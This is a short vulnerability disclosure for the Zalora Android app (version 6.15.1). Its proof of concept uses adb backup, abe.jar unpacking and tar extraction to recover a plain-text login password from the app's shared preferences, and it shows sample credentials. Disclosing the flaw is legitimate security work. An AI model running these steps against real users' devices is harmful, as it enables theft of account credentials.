Zalora

1. #Application: Zalora
2. #Platform: Android
3. #Version: 6.15.1 (latest)
4. #Severity: Medium
5. #Impact: None-root user can read the password in clear-text and login to the application.
6.  
7. POC:
8.  
9. 1. Backups application data into Local PC
10. adb backup -f ~/zalora.ab -noapk com.zalora.android
11.  
12. 2. Converts file "zalora.ab" into tar file(file contains backup data of com.zalora.android)
13. java -jar abe.jar unpack ~/zalora.ab zalora.tar ""
14.  
15. 3. Extracts tar file.
16. tar -xvf zalora.tar
17.  
18. 4. After the extraction, goes and checks the data in the directory located in apps/com.zalora.android/
19.  
20. 5. Looks for sensitive data. The password stored in /shared_prefs/login_data.xml in plain-text
21.  
22. <?xml version='1.0' encoding='utf-8' standalone='yes' ?>
23. <map>
24. <string name="login_data">{&quot;password&quot;:&quot;P4ssw0rd123&quot;,&quot;email&quot;:&quot;testme@gmail.com&quot;}</string>
25. </map>